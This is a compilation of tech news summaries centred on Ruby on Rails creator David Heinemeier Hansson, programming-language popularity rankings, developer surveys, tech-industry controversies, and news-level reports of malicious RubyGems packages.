Wojtek Borowicz interviews David Heinemeier Hansson, the creator of the popular Ruby on Rails web development framework: Wojtek Borowicz: Software methodology is an industry of its own. There is Scrum, and Agile, and coaches, and books, and all of that. But you and your team at Basecamp don't follow these practices. Why?

DHH: First of all, our approach to software development is heavily inspired by the Agile Manifesto and the Agile values. It is not so much inspired by the Agile practices as they exist today. A lot of Agile software methodologies focus on areas of product development that are not where the hard bits lie. They are so much about the procedural structures. Software, in most cases, is inherently unpredictable, unknowable, and unshaped. It's almost like a gas. It can fit into all sorts of different openings from the same basic idea. The notion of trying to estimate how long a feature is going to take doesn't work because you don't know what you're building and because humans are terrible at estimating anything. The history of software development is one of late or cancelled projects. If you were to summarize the entire endeavor of software development, you'd say: 'The project ran late and it got canceled.' Planning work doesn't work, so to speak.

What we do at Basecamp we chose to label Shape Up, simply because that is where we find the hard work to be. We're trying to just accept the core constraint that it is impossible to accurately specify what software should do up front. You can only discover what software should do within constraints. But it's not like we follow the idea that it's done when it's done, either. That's an absolute abdication of product management thinking. What we say instead is: don't do estimates, do budgets. The core of Shape Up is about budgets. Not how long is something going to take but what is something worth. Because something could take a week or four months. What is it worth? [...]

Wojtek Borowicz: So the problem with those methodologies is they put too much focus on estimating, which is inherently impossible with software?

DHH: I'd go even further and say that estimation is bullshit. It's so imprecise as to be useless, even when you're dealing with fixed inputs. And you're not. No one is ever able to accurately describe what a piece of software should do before they see the piece of software. This idea that we can preemptively describe what something should do before we start working on it is bunk. Agile was sort of onto this idea that you need running software to get feedback but the modern implementations of Agile are not embracing the lesson they themselves taught.

This week saw the release of the 2020 Ruby on Rails Community Survey Results: 2,049 members of the Rails community from 92 countries kindly contributed their thoughts on tools, frameworks, and workflows in their day to day development lives. From these responses we hope to get an understanding of where Rails stands as a framework in 2020.

Some of these questions have been asked since our original survey over a decade ago, and show how the community has evolved over the last twelve years. Inside.com's developer newsletter summarized some of the results: - The typical Rails developer is self-taught, has been working with Rails 4-7 years, and works remotely...

- Rails developers overwhelmingly choose lightweight solutions like jQuery over larger frameworks.

- Most of the developers surveyed feel Rails is still relevant, although they were split on whether or not the Rails core team is moving in the right direction, with 48% totally agreeing with that sentiment.
According to the results, 24% of survey respondents primarily developing on Linux, while 73% used Mac OS X (leaving just 3% using Windows or "Other"). Yet the most popular editor was Microsoft's Visual Studio Code (used by 32% of respondents), followed by Vim-based editors (21%), Sublime (16%), RubyMine (15%), Atom (9%), Emacs (3%), and TextMate (2%).

The survey also asked the size of development teams for "your primary Rails application."

• A team of one - 17%
• Two to four - 35%
• Five to eight - 19%
• Eight to 15 - 13%
• 16 to 25 - 6%
• 25-50 - 5%
• 50-plus - 5%

Meanwhile, in a recent talk, Ruby creator Yukihiro Matsumoto confirmed that Ruby 3 will finally be released this Christmas, December 25, bringing a new pattern-matching syntax, right-hand-side variable assignment, and numbered block parameters.

He also promised improvements to help make Ruby more fast, more concurrent, and more correct. (Though "We don't pursue completeness nor soundness of the type systems, because, you know, Ruby is Ruby. Ruby is basically dynamically typed...")

Microsoft just launched a new website "to showcase how it's embracing open source to 'bring choice, technology and community to our customers,'" reports ZDNet: Microsoft, under CEO Satya Nadella, has said and done a lot to shed its image as a pariah of Linux and open-source software communities. With a Linux kernel for Windows 10, GitHub, a new Android Surface Duo, and the commercial cloud as its main source of revenue, Microsoft is a very different company than it was 30 years ago when it was afraid open-source software would gobble up its intellectual property and revenues.

Nowadays, it's got a growing number of open-source projects, including its hugely popular cross-platform code editor Visual Studio Code (VS Code), .NET Core, the hit JavaScript-based programming language TypeScript, and new open-source Windows developer tools like PowerToys and Windows Terminal... According to the company, over 35,000 engineers at the company are using GitHub Enterprise Cloud to host and release official Microsoft open-source projects, samples, and documentation....

Jeff Wilcox, a software engineer with the Microsoft Open Source Programs Office, announced the new site Thursday. He notes that it is "built by the Ruby open-source project Jekyll (that also powers GitHub Pages)".

The R programming language is experiencing a surge in popularity "in the slipstream of Python," according to this month's TIOBE index, leaping into the top ten.

"For historical context, we wrote of R's spot in TIOBE nearly two years ago, and it had just made the leap from #50 to #39," writes programming columnist Mike Melanson.

ZDNet writes: In May, when R crashed out of the top 20 for the first time in three years, Tiobe speculated that the language could be a victim of consolidation in statistical programming, with more developers in the field gravitating towards Python.
But there's been a lot of motion since then, Tech Republic reports: R rose one space to eighth place in July, but its comparison to 2019 is where the real surprise lies: It was in 20th place at the same time last year. TIOBE CEO Paul Jansen cites two reasons why R may be increasing in popularity:

- Universities and research institutes have moved away from commercial statistical languages like SAS and Stata in favor of open source languages Python and R.

- The increase in analytics being used to search for a COVID-19 vaccine....

The largest gainers in popularity between July 2019 and July 2020 are Go, which jumped from 16th to 12th place, Perl, jumping from No. 19 to No. 14, Scratch, jumping from No. 30 to No. 17, Rust, which moved from No. 33 to No. 18, and PL/SQL, which moved from No. 23 to No. 19.

Ruby fell the most, moving from 11th place to 16th, while SQL, MATLAB, and Assembly Language also slipped down the list.
ZDNet adds that "Besides R's upwards shift, Tiobe's July index doesn't show much movement in the popularity of the top languages. The top 10 in descending order are C, Java, Python, C++, C#, Visual Basic, JavaScript, R, PHP and Swift."

Visual Studio magazine argues that the biggest surprise may be that the 29-year-old language classic Visual Basic is still in the top 20 — since its last stable release was 22 years ago, and by 2008 it was finally retired by Microsoft. "VB6 just refuses to go away, achieving cult-like status among a group of hard-core supporters."

Last week leaked audio surfaced of investors arguing that journalists have too much power.

But the Verge's Silicon Valley editor asks, "What if you take the whole discussion of "tech versus journalism" and reframe it as 'managers versus employees'? Then, I think, you get closer to the truth of what's going on." After all, this conflict started with employees. They were the people who initially described their working conditions under Steph Korey at Away, leading her to step aside as CEO. (She later returned, only for the company to say she would step aside later this year after her comments about the media on Instagram.) The employees made their comments at a time of increasing activism inside workplaces. Since the Google walkout in 2018, employees of venture-backed startups and public companies have become increasingly comfortable in speaking out — often using social media platforms to call out their employers. This trend has only accelerated since the Black Lives Matters protests swept the nation last month — which, among other things, led to the first-ever virtual Facebook walkout a few weeks later.

Workers still face significant obstacles as they lobby to create more fair and equitable workplaces. But Twitter in particular has given them a place where not only can they be heard, but — crucially — employers can't really fight back... [T]weets have given workers an asymmetric advantage in the unrest — a one-sided argument is easy to win — and we're seeing it play out in new ways all the time. This dynamic, which is tilted heavily against bosses, goes a long way in explaining the disdain that the managerial class has for what they call "hit pieces." A "hit piece," in angry Twitter parlance, is typically a piece of journalism in which one or more employees are granted anonymity to talk about their working conditions. Journalists, myself included, would simply call that reporting. But it's the kind of reporting that tilts the balance away from managers and toward their employees — and in ways that are difficult to fight back against...

And so it shouldn't be surprising, when a prominent reporter like Taylor Lorenz calls attention to posts like Korey's, the managerial class rises to Korey's defense. When CEOs can be held accountable not just for their working conditions but for social media defenses of their work, that represents a threat to the entire managerial tribe. And that explains how venture capitalists, who have millions of dollars at their disposal and could comfortably retire without ever participating in a single Twitter fight, have nonetheless come to see themselves as the underdogs in this situation. They got where they are in part because they've been good at winning arguments, and now they find themselves living in a world where they get punished for arguing...

[T]he next time you see journalists and tech overlords going a few rounds online, ask yourself whether what you're looking at isn't, on some level, a labor issue...

Workers are justifiably outraged about the state of affairs in this country, and some of that outrage is being captured by journalists.
David Heinemeier Hansson, creator of Ruby on Rails and the founder of Basecamp, called the piece "a wonderful framing of the issue" in a series of tweets. "While I decry this website as the bane of modern living half the time, the other half it has probably done more to move my own position on many issues than anything else online.

"Which is why I'm not actually sure that VC Twitter should be so eager to cheer on 'citizen journalism'. The number of citizens that count themselves in the worker class vs. manager class are far more plentiful. And their unfiltered stories really do add up to paint the picture."

A confrontation between venture capitalists and journalists has been slowly playing out on Twitter — and in an incendiary article on VICE US.

It started when...

• A luggage startup's co-CEO complained on Instagram about young reporters who "forgo their personal ethics."

• A New York Times reporter called the posts "incoherent" and "disappointing."

• Angel investor Balaji S. Srinivasan (also the former CTO of Coinbase) later said the reporter "attacked" the co-CEO, who he then needed to defend — calling the reporter a sociopath in a multi-tweet thread.

• The New York Times reporter tweeted that investor had "been ranting about me by name for months now."

The reporter and the angel investor both finally ended up on Clubhouse, an elite invitation-only audio social network popular with venture capitalists, but the reporter left early. Later Vice published leaked audio of the subsequent conversation, which included Srinivasan and several other Andreessen Horowitz venture capitalists, in which Vice says participants "spent at least an hour talking about how journalists have too much power to 'cancel' people and wondering what they, the titans of Silicon Valley, could do about it."

Then things got really ugly...

The "bespoke development" site Evrone.com (an IT outsourcing company) interviewed Ruby on Rails creator David Heinemeier Hansson (who is also co-founder and CTO of Basecamp -- and a racecar driver) shortly before he spoke at RubyRussia, Evrone's annual Moscow programming conference.

And they asked him an interesting question. As a man who's seen lots of Ruby code, "what makes code good or shitty? Anything that is obvious for you at first glance?" David Heinemeier Hansson: If the code is poorly written, usually it smells before you even examine the logic. Indentation is off, styles are mixed, care is simply not shown. Beyond that, learning how to write great code, is a life long pursuit. As I said in my RailsConf 2014 keynote, we're not software engineers, we're software writers. "Writing" is a much more suitable metaphor for what we do most of the time than "engineering" is. Writing is about clarity and presenting information in a clear-to-follow manner so that anybody can understand it.

There's no list of principles and practices that somebody can be taught and then they will automatically produce clear writing every time. If you want to be a good writer, it's not enough just to memorize the dictionary. Just knowing the words available to you, knowing the patterns of development is not going to make you a good developer. You have to develop an eye. You have to decide that the most important thing for your system is clarity. When you do decide that, you can start developing an eye.

The only way to become a good programmer, where, by definition, I define good programmers as somebody who writes software with clarity, is to read a lot of software and write a lot of software.
In 2016, David Heinemeier Hansson answered questions from Slashdot readers.

The Basecamp cofounder and creator of web application framework Ruby on Rails David Heinemeier Hansson has become increasingly outspoken about Big Tech's privacy violations and monopolistic tendencies. Now he's inviting you to join the cause -- by switching your email provider. From a report: Two years ago, he and fellow Basecamp cofounder and CEO Jason Fried decided to do something about it. The culmination of that work is a paid, $99-per-year email service called Hey, which launches today. Along with protecting users from the types of invasive surveillance tactics that have become de rigueur online, Hey also contains some radical ideas about the way that modern correspondence should work. Silicon Valley will be watching the product closely: Consumers like to say they value their privacy, but are they finally willing to pay for it?

[...] Most people haven't tried a new email service since Gmail launched 16 years ago, if not earlier. A handful of startups have played around with email interfaces in the years since, trying to make the experience cleaner and mobile-friendly, but no one has touched concepts as foundational as the inbox itself. Hansson and Fried argue that now is the time to do just that. They have made several radical changes to the inbox, the most glaring of which is that you, the email recipient, have control over who is allowed to appear there. That means you screen all first-time senders. They've also separated out what they call the "The Feed" and the "Paper Trail," so that there are distinct places for emails like newsletters and shipping confirmation notices. Because The Feed requires opt-in confirmation, it's much more pleasant to browse than Gmail's cluttered Promotions tab. It's also more private: Hey strips incoming messages of the tracking tools known as spy pixels that have become common practice in many emails. (The service indicates any emails that originally had tracking capabilities by displaying a small binoculars icon next to them.)

Stack Overflow has released the results of its 2020 survey of nearly 65,000 developers, revealing their favorite and most dreaded programming languages, tools and frameworks. From a news writeup: The survey shows that TypeScript, Microsoft's superset of the widely-used JavaScript programming language, has overtaken Python as the second most beloved programming language behind Rust. This year 86% of respondents say they are keen to use Rust, while 67.1% want to use TypeScript, and 66.7% want to use Python. Stack Overflow attributes TypeScript's rising popularity to Microsoft's embrace of open source software as well as the existence of larger and more complex JavaScript and Node.js codebases.

Rust has been the most loved programming language for five years running, despite few developers having experience with it. This year, just 5.1% developers report having used Rust, compared with the 68% who use JavaScript, which is the most commonly used language. [...] Meanwhile, the top 10 most dreaded programming languages are VBA, Objective-C, Perl, Assembly, C, PHP, Ruby, C++, Java and R.

The report also looks at average salaries of each developer role. In the US, engineering managers attract the highest salary at $152,000 per year, followed by site reliability engineers who earn $140,000 per year. Salaries across the globe for these roles are lower, at $92,000 for an engineering manager and $80,000 for a site reliability engineer. Other high-paying roles with an average salary of at least $115,000 in the US include data scientist and machine learning specialist, DevOps specialist, engineer, back-end developer, embedded application developers, mobile developers, scientist, desktop application developer, and educator.

Security researchers from ReversingLabs say they've discovered 725 Ruby libraries uploaded on the official RubyGems repository that contained malware meant to hijack users' clipboards. From a report: The malicious packages were uploaded on RubyGems between February 16 and 25 by two accounts -- JimCarrey and PeterGibbons. The 725 libraries, which are listed here in full, have been removed two days later, on February 27, after the ReversingLabs team notified the RubyGems security team. All the Ruby libraries were copies of legitimate libraries, used lookalike names, worked as intended, but also contained additional malicious files. The extra file inserted into each package was named aaa.png. However, ReversingLabs say this file wasn't a PNG image, but instead was a Windows PE executable.

The tech jobs marketplace at Hired.com crunched their data on more than 400,000 interview requests and job offers over the last year to produce their annual "State of Software Engineers" report. Among its surprising insights: software engineers with more than 10 years of experience get 20% fewere interview requests than engineers with 4 to 10 years of experience.

Other insights: Demand for AR/VR talent is up by 1400%, mirroring blockchain's 517% demand growth last year... In large U.S. tech hubs AR/VR engineer salaries range from $135k - $150k... 46% of software engineers rank AR/VR as one of the top 3 technologies they'd like to learn in 2020... If you work in AR/VR, you may want to move to San Francisco, where they pay $150k/year on average.
The next-highest growth in demand came for "gaming engineers" and "computer vision engineers" -- with both positions seeing a 146% increase in demand over 2018. The next-highest demand growth was for "search engineers" (increasing 137%) and for "machine learning engineers" (increasing 89%). Demand for "blockchain engineers" increased by just 9%.

But they also report that demand for frontend and backend engineers "grew steadily by 17%, which shows that all companies -- not just Silicon Valley tech giants -- are evolving into being tech companies..." The worldwide process of digital transformation, while something of a buzzword, reflects a critical truth: every company is now a technology company. Whether the company is Bank of America, Alaska Airlines, Sainsbury's, or Tesla, investment in top software engineering talent isn't a future ambition, it's a matter of survival.
And the #1 most-desired coding skill was Go (for the second year in a row), "garnering an average of 9.2 interview requests for every Go-skilled candidate..." But there may be a larger trend. All told, the number of interview requests across all languages remained nearly constant year-over-year, with only minor fluctuations in average requests, and zero change in how each language ranked against others. This could suggest that supply for these skills has not yet caught up with demand...

According to Robert Half, 67% of IT managers plan to expand their teams in areas such as security, cloud computing and business intelligence, but 89% reported challenges in recruiting that talent. Those challenges in hiring are even greater for roles related to machine learning, artificial intelligence, and blockchain.
Their analysis concludes the most in-demand programming languages are Go, Scala, Ruby, TypeScript, Kotlin, Objective C, JavaScript, Swift, PHP, Java, HTML, and then Python -- though Python, JavaScript, and Java are engineers' favorite coding languages, "largely because of their useful and well-maintained libraries and packages..."

"Ruby, PHP and Objective C are ranked the least favorite (and least fun) languages for software engineers."

An anonymous reader quotes the Verge: In December, online coding bootcamp Lambda School quietly partnered with Edly, a digital marketplace that helps schools sell income-sharing agreements (ISAs) to accredited investors. The arrangement allows Lambda to receive money from the ISAs upfront, rather than waiting for students to find jobs. But it also flies in the face of the values Lambda typically espouses: namely, that ISAs align its incentives with the goals and aspirations of the students...

Lambda's ISAs promise an alternative to traditional student loans by allowing students to defer tuition until they've landed a job that pays $50,000 a year or more. When that happens, they hand over 17 percent of their income until the $30,000 tuition is paid off. If students don't find work within five years of completing the program, the ISA is automatically dissolved. It's a business model that allows Lambda to brag about investing in students — which, in many ways, it still does. The school provides living stipends and even housing to some students who need it. But reselling ISAs muddies the narrative a bit since Lambda can make money long before students find jobs...

Shortly after the arrangement was called out on Twitter, following a report by The Verge about some students' disappointment with the curriculum, Edly began taking down pages that referenced the Lambda partnership. Edly did not immediately respond to a request for comment about why these pages were taken down, and Lambda declined to comment on the nature of the partnership at all.
"I wonder why Lambda isn't so keen on seeing discussions about how students are being packed into the same kind of CDOs that brought us the financial crisis," tweeted David Heinemeier Hansson, the creator of Ruby on Rails, who's been tweeting screenshots of Edly's past statements about their ambitions as well as links to Google's cache of Edly's pitches to investors.

Last year Wired reported that nearly half of Lambda's ISAs had at least partly been sold off to investors. They also note that in January of 2019, Lambda "received $30 million from investors including Google Ventures, Y Combinator, and Ashton Kutcher."

Makers of productivity suite Basecamp have announced Hey, an email product they plan to release this spring. Basecamp founder and CEO, Jason Fried shared the vision for what they are calling a much-improved approach to email in an open letter today on the Hey website: You started getting stuff you didn't want from people you didn't know. You lost control over who could reach you. You were forced to inherit other people's bad communication habits. Then an avalanche of automated emails amplified the clutter. And Gmail, Outlook, Yahoo, Apple, and all the others just let it happen. Now email feels like a chore, rather than a joy. Something you fall behind on. Something you clear out, not cherish. Rather than delight in it, you deal with it. Your relationship with email changed, and you didn't have a say.

So good news, the magic's still there. It's just obscured -- buried under a mess of modern day bad habits and neglect. Some from people, some from machines, a lot from email systems. It deserves a dust off. A renovation. Modernized for the way we email today. With HEY, we've done just that. It's a redo, a rethink, a simplified, potent reintroduction of email. A fresh start, the way it should be. For web, iOS, and Android. HEY is our love letter to email, and we're sending it to you. Over 12,000 people have requested early access to Hey since yesterday, said David Heinemeier Hansson, founder of Basecamp, and creator of Ruby on Rails.

Which programming language saw the biggest jump on TIOBE's index of language popularity over the last year?

Unlike last year -- it's not Python. An anonymous reader quotes TIOBE.com: It is good old language C that wins the award this time with an yearly increase of 2.4%... The major drivers behind this trend are the Internet of Things (IoT) and the vast amount of small intelligent devices that are released nowadays...

Runners up are C# (+2.1%), Python (+1.4%) and Swift (+0.6%)...

Other interesting winners of 2019 are Swift (from #15 to #9) and Ruby (from #18 to #11). Swift is a permanent top 10 player now and Ruby seems [destined] to become one soon.

Some languages that were supposed to break through in 2019 didn't: Rust won only 3 positions (from #33 to #30), Kotlin lost 3 positions (from #31 to #35), Julia lost even 10 positions (from #37 to #47) and TypeScript won just one position (from #49 to #48).
And here's the new top 10 programming languages right now, according to TIOBE's January 2020 index.

• Java
• C
• Python
• C++
• C# (up two positions from January 2019)
• Visual Basic .NET (down one position from January 2019)
• JavaScript (down one position from January 2019)
• PHP
• Swift (up six positions from January 2019)
• SQL (down one position from January 2019)

TechCrunch reports that another employee, engineer Alice Goldfuss, has resigned from GitHub over the company's $200,000 contract with Immigration and Customs Enforcement (ICE). From the report: In a tweet, Goldfuss said GitHub has a number of problems to address and that "ICE is only the latest." Meanwhile, Vice reports at least five staffers quit today. These resignations come the same day as GitHub Universe, the company's big product conference. Ahead of the conference, Tech Workers Coalition protested the event, setting up a cage to represent where ICE detains children.

Last month, GitHub staff engineer Sophie Haskins resigned, stating she was leaving because the company did not cancel its contract with ICE, The Los Angeles Times reported. Last month, GitHub employees penned an open letter urging the company to stop working with ICE. That came following GitHub's announcement of a $500,000 donation to nonprofit organizations in support of "immigrant communities targeted by the current administration." In that announcement, GitHub CEO Nat Friedman said ICE's purchase was made through one of GitHub's reseller partners and said the deal is not "financially material" for the company. Friedman also pointed out that ICE is responsible for more than immigration and detention facilities.

An anonymous reader quotes the BBC: A US financial regulator has opened an investigation into claims Apple's credit card offered different credit limits for men and women. It follows complaints -- including from Apple's co-founder Steve Wozniak -- that algorithms used to set limits might be inherently biased against women.

New York's Department of Financial Services has contacted Goldman Sachs, which runs the Apple Card. Any discrimination, intentional or not, "violates New York law", the Department of Financial Services said. The Bloomberg news agency reported on Saturday that tech entrepreneur David Heinemeier Hansson had complained that the Apple Card gave him 20 times the credit limit that his wife got. In a tweet, Mr Hansson said the disparity was despite his wife having a better credit score. Later, Mr Wozniak, who founded Apple with Steve Jobs, tweeted that the same thing happened to him and his wife despite their having no separate bank accounts or separate assets. Banks and other lenders are increasingly using machine-learning technology to cut costs and boost loan applications. But Mr Hansson, creator of the programming tool Ruby on Rails, said it highlights how algorithms, not just people, can discriminate.
"Apple and Goldman Sachs have both accepted that they have no control over the product they sell," Hansson posted angrily on Twitter. "THE ALGORITHM is in charge now!

"All humans can do is apologize on its behalf, and pray that it has mercy on the next potential victims."

An anonymous reader quotes a report from ZDNet: A software engineer pulled a personal project down after he found out that one of the companies using it had recently signed a contract with the U.S. Immigrations and Customs Enforcement (ICE). The engineer, Seth Vargo, cited the ICE's "inhumane treatment, denial of basic human rights, and detaining children in cages," as the reason for taking down his library. The project was called Chef Sugar, a Ruby library for simplifying work with Chef, a platform for configuration management. Varga developed and open-sourced the library while he worked at Chef, and the library was later integrated into Chef's source code.

Earlier this week, a Twitter user discovered that Chef was selling $95,000-worth of licenses through a government contractor to the ICE. The news didn't go well with Vargo, who, yesterday, September 19, took down the Chef Sugar library from both GitHub and RubyGems, the main Ruby package repository, in a sign of protest. "I have a moral and ethical obligation to prevent my source from being used for evil," Vargo wrote on the now-empty Chef Sugar GitHub repository. Vargo's actions didn't go unnoticed, and in a blog post published later in the day, Chef Software CEO Barry Crist said the incident impacted "production systems for a number of our customers." The Chef team fixed the issue by scouring some of the older Chef Sugar source code and re-uploading it on their own GitHub account. Following public criticism of the contract, Chef Software CEO Barry Crist responded by saying the company had been a long-time ICE collaborator for years, since the previous administration, long before ICE became the hated agency it is today.

"While I understand that many of you and many of our community members would prefer we had no business relationship with DHS-ICE, I have made a principled decision, with the support of the Chef executive team, to work with the institutions of our government, regardless of whether or not we personally agree with their various policies," Crist said.

"I want to be clear that this decision is not about contract value - it is about maintaining a consistent and fair business approach in these volatile times. I do not believe that it is appropriate, practical, or within our mission to examine specific government projects with the purpose of selecting which U.S. agencies we should or should not do business," Crist added.

"A rash of supply chain attacks hitting open source software over the past year shows few signs of abating, following the discovery this week of two separate backdoors slipped into a dozen libraries downloaded by hundreds of thousands of server administrators," reports Ars Technica: The compromises of Webmin and the RubyGems libraries are only the latest supply chain attacks to hit open source software. Most people don't think twice about installing software or updates from the official site of a known developer. As developers continue to make software and websites harder to exploit, black hats over the past few years have increasingly exploited this trust to spread malicious wares by poisoning code at its source...

To be fair, closed-source software also falls prey to supply-side attacks -- as evidenced by those that hit computer maker ASUS on two occasions, the malicious update to tax-accounting software M.E.Doc that seeded the NotPetya outbreak of 2017, and another backdoor that infected users of the CCleaner hard drive utility that same year. But the low-hanging fruit for supply chain attacks seems to be open source projects, in part because many don't make multi-factor authentication and code signing mandatory among its large base of contributors.

"The recent discoveries make it clear that these issues are becoming more frequent and that the security ecosystem around package publication and management isn't improving fast enough," Atredis Partners Vice President of Research and Development HD Moore told Ars. "The scary part is that each of these instances likely resulted in even more developer accounts being compromised (through captured passwords, authorization tokens, API keys, and SSH keys). The attackers likely have enough credentials at hand to do this again, repeatedly, until all credentials are reset and appropriate MFA and signing is put in place."

Maintainers of the RubyGems package repository have yanked 18 malicious versions of 11 Ruby libraries that contained a backdoor mechanism and were caught inserting code that launched hidden cryptocurrency mining operations inside other people's Ruby projects. ZDNet reports: The malicious code was first discovered yesterday inside four versions of rest-client, an extremely popular Ruby library. According to an analysis by Jan Dintel, a Dutch Ruby developer, the malicious code found in rest-client would collect and send the URL and environment variables of a compromised system to a remote server in Ukraine. "Depending on your set-up this can include credentials of services that you use e.g. database, payment service provider," Dintel said.

The code also contained a backdoor mechanism that allowed the attacker to send a cookie file back to a compromised project, and allow the attacker to execute malicious commands. A subsequent investigation by the RubyGems staff discovered that this mechanism was being abused to insert cryptocurrency mining code. RubyGems staff also uncovered similar code in 10 other projects. All the libraries, except rest-client, were created by taking another fully functional library, adding the malicious code, and then re-uploading it on RubyGems under a new name. All in all, all the 18 malicious library versions only managed to amass 3,584 downloads before being removed from RubyGems.

An anonymous reader shares a report: Not all programming languages endure forever. In fact, even the most popular ones inevitably crumble away, as new generations of developers embrace other languages and frameworks they find easier to work with. In order to determine which programming languages are likely doomed in the medium- to long-term, we looked at the popularity rankings by TIOBE and RedMonk, as well as Dice's own database of job postings. If your career is based on any of the following languages, we suggest diversifying your skill-set at some point: Ruby, Haskell, Objective-C, R, and Perl.